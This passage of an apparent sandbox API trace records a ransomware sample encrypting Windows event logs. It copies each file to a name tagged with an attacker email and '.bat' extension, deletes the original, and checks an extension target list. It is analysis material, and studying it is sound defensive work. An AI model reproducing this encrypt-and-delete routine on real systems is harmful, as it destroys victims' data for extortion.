lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.898] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.898] WriteFile (in: hFile=0x398, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x128, lpOverlapped=0x0) returned 1 [0065.899] SetEndOfFile (hFile=0x398) returned 1 [0065.899] CloseHandle (hObject=0x398) returned 1 [0065.901] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.901] SetEndOfFile (hFile=0x370) returned 1 [0065.902] CloseHandle (hObject=0x370) returned 1 [0065.902] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.903] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx")) returned 1 [0065.903] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.903] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.903] lstrlenW (lpString=".doc") returned 4 [0065.903] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.903] lstrlenW (lpString=".docx") returned 5 [0065.903] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.903] lstrlenW (lpString=".pdf") returned 4 [0065.903] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.903] lstrlenW (lpString=".xls") returned 4 [0065.903] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.903] lstrlenW (lpString=".xlsx") returned 5 [0065.903] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.903] lstrlenW (lpString=".ppt") returned 4 [0065.903] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.903] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.903] lstrlenW (lpString=".zip") returned 4 [0065.903] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.911] lstrlenW (lpString=".rar") returned 4 [0065.911] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.911] lstrlenW (lpString=".bz2") returned 4 [0065.911] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.911] lstrlenW (lpString=".7z") returned 3 [0065.911] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.911] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.911] lstrlenW (lpString=".dbf") returned 4 [0065.911] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.911] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.911] lstrlenW (lpString=".1cd") returned 4 [0065.911] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.911] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.911] lstrlenW (lpString=".jpg") returned 4 [0065.911] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.911] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.911] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.911] lstrlenW (lpString=".doc") returned 4 [0065.912] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.912] lstrlenW (lpString=".docx") returned 5 [0065.912] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.912] lstrlenW (lpString=".pdf") returned 4 [0065.912] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.912] lstrlenW (lpString=".xls") returned 4 [0065.912] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.912] lstrlenW (lpString=".xlsx") returned 5 [0065.912] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.912] lstrlenW (lpString=".ppt") returned 4 [0065.912] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.912] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.912] lstrlenW (lpString=".zip") returned 4 [0065.912] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.912] lstrlenW (lpString=".rar") returned 4 [0065.912] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.912] lstrlenW (lpString=".bz2") returned 4 [0065.912] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.912] lstrlenW (lpString=".7z") returned 3 [0065.912] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.912] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.912] lstrlenW (lpString=".dbf") returned 4 [0065.912] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.912] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.912] lstrlenW (lpString=".1cd") returned 4 [0065.912] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.912] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0065.912] lstrlenW (lpString=".jpg") returned 4 [0065.912] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.913] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.913] lstrlenW (lpString="Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 47 [0065.913] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0065.914] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0065.914] CloseHandle (hObject=0x370) returned 1 [0065.914] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx")) returned 0x20 [0065.914] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.914] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0065.914] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.914] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.914] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0065.914] GetLastError () returned 0x0 [0065.914] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.916] WriteFile (in: hFile=0x398, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.918] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.918] WriteFile (in: hFile=0x398, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x132, lpOverlapped=0x0) returned 1 [0065.918] SetEndOfFile (hFile=0x398) returned 1 [0065.918] CloseHandle (hObject=0x398) returned 1 [0066.239] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.239] SetEndOfFile (hFile=0x370) returned 1 [0066.240] CloseHandle (hObject=0x370) returned 1 [0066.240] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.240] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx")) returned 1 [0066.240] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.240] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.240] lstrlenW (lpString=".doc") returned 4 [0066.241] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.241] lstrlenW (lpString=".docx") returned 5 [0066.241] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.241] lstrlenW (lpString=".pdf") returned 4 [0066.241] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.241] lstrlenW (lpString=".xls") returned 4 [0066.241] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.241] lstrlenW (lpString=".xlsx") returned 5 [0066.241] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.241] lstrlenW (lpString=".ppt") returned 4 [0066.241] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.241] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.241] lstrlenW (lpString=".zip") returned 4 [0066.241] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.241] lstrlenW (lpString=".rar") returned 4 [0066.241] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.241] lstrlenW (lpString=".bz2") returned 4 [0066.241] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.241] lstrlenW (lpString=".7z") returned 3 [0066.241] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.241] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.241] lstrlenW (lpString=".dbf") returned 4 [0066.241] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.241] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.241] lstrlenW (lpString=".1cd") returned 4 [0066.241] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.241] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.241] lstrlenW (lpString=".jpg") returned 4 [0066.241] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.241] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.241] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.241] lstrlenW (lpString=".doc") returned 4 [0066.242] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.242] lstrlenW (lpString=".docx") returned 5 [0066.242] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.242] lstrlenW (lpString=".pdf") returned 4 [0066.242] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.242] lstrlenW (lpString=".xls") returned 4 [0066.242] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.242] lstrlenW (lpString=".xlsx") returned 5 [0066.242] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.242] lstrlenW (lpString=".ppt") returned 4 [0066.242] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.242] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.242] lstrlenW (lpString=".zip") returned 4 [0066.242] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.242] lstrlenW (lpString=".rar") returned 4 [0066.242] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.242] lstrlenW (lpString=".bz2") returned 4 [0066.242] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.242] lstrlenW (lpString=".7z") returned 3 [0066.242] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.242] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.242] lstrlenW (lpString=".dbf") returned 4 [0066.242] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.242] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.242] lstrlenW (lpString=".1cd") returned 4 [0066.242] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.242] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0066.242] lstrlenW (lpString=".jpg") returned 4 [0066.242] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.242] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.243] lstrlenW (lpString="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 74 [0066.243] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0066.243] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0066.243] CloseHandle (hObject=0x370) returned 1 [0066.243] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx")) returned 0x20 [0066.243] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0066.243] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0066.244] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.244] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.244] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0066.244] GetLastError () returned 0x0 [0066.244] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0066.246] WriteFile (in: hFile=0x398, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0066.248] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.248] WriteFile (in: hFile=0x398, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x168, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x168, lpOverlapped=0x0) returned 1 [0066.248] SetEndOfFile (hFile=0x398) returned 1 [0066.248] CloseHandle (hObject=0x398) returned 1 [0066.248] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.248] SetEndOfFile (hFile=0x370) returned 1 [0066.249] CloseHandle (hObject=0x370) returned 1 [0066.249] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.250] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx")) returned 1 [0066.250] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.250] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.250] lstrlenW (lpString=".doc") returned 4 [0066.250] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.250] lstrlenW (lpString=".docx") returned 5 [0066.250] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.250] lstrlenW (lpString=".pdf") returned 4 [0066.250] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.250] lstrlenW (lpString=".xls") returned 4 [0066.250] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.250] lstrlenW (lpString=".xlsx") returned 5 [0066.250] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.250] lstrlenW (lpString=".ppt") returned 4 [0066.250] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.250] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.250] lstrlenW (lpString=".zip") returned 4 [0066.250] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.250] lstrlenW (lpString=".rar") returned 4 [0066.250] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.250] lstrlenW (lpString=".bz2") returned 4 [0066.250] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.250] lstrlenW (lpString=".7z") returned 3 [0066.250] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.250] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.250] lstrlenW (lpString=".dbf") returned 4 [0066.250] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.250] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.250] lstrlenW (lpString=".1cd") returned 4 [0066.251] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.251] lstrlenW (lpString=".jpg") returned 4 [0066.251] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.251] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.251] lstrlenW (lpString=".doc") returned 4 [0066.251] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString=".docx") returned 5 [0066.251] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.251] lstrlenW (lpString=".pdf") returned 4 [0066.251] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString=".xls") returned 4 [0066.251] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString=".xlsx") returned 5 [0066.251] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.251] lstrlenW (lpString=".ppt") returned 4 [0066.251] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.251] lstrlenW (lpString=".zip") returned 4 [0066.251] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString=".rar") returned 4 [0066.251] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString=".bz2") returned 4 [0066.251] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString=".7z") returned 3 [0066.251] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.251] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.251] lstrlenW (lpString=".dbf") returned 4 [0066.251] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.251] lstrlenW (lpString=".1cd") returned 4 [0066.251] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.251] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0066.251] lstrlenW (lpString=".jpg") returned 4 [0066.251] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.252] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.252] lstrlenW (lpString="Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 46 [0066.252] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0066.252] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0066.252] CloseHandle (hObject=0x370) returned 1 [0066.252] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx")) returned 0x20 [0066.252] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0066.252] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0066.252] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.252] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.253] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0066.270] GetLastError () returned 0x0 [0066.270] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0066.276] WriteFile (in: hFile=0x2c8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0066.277] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.277] WriteFile (in: hFile=0x2c8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x130, lpOverlapped=0x0) returned 1 [0066.277] SetEndOfFile (hFile=0x2c8) returned 1 [0066.278] CloseHandle (hObject=0x2c8) returned 1 [0066.278] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.278] SetEndOfFile (hFile=0x370) returned 1 [0066.279] CloseHandle (hObject=0x370) returned 1 [0066.279] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.279] DeleteFileW 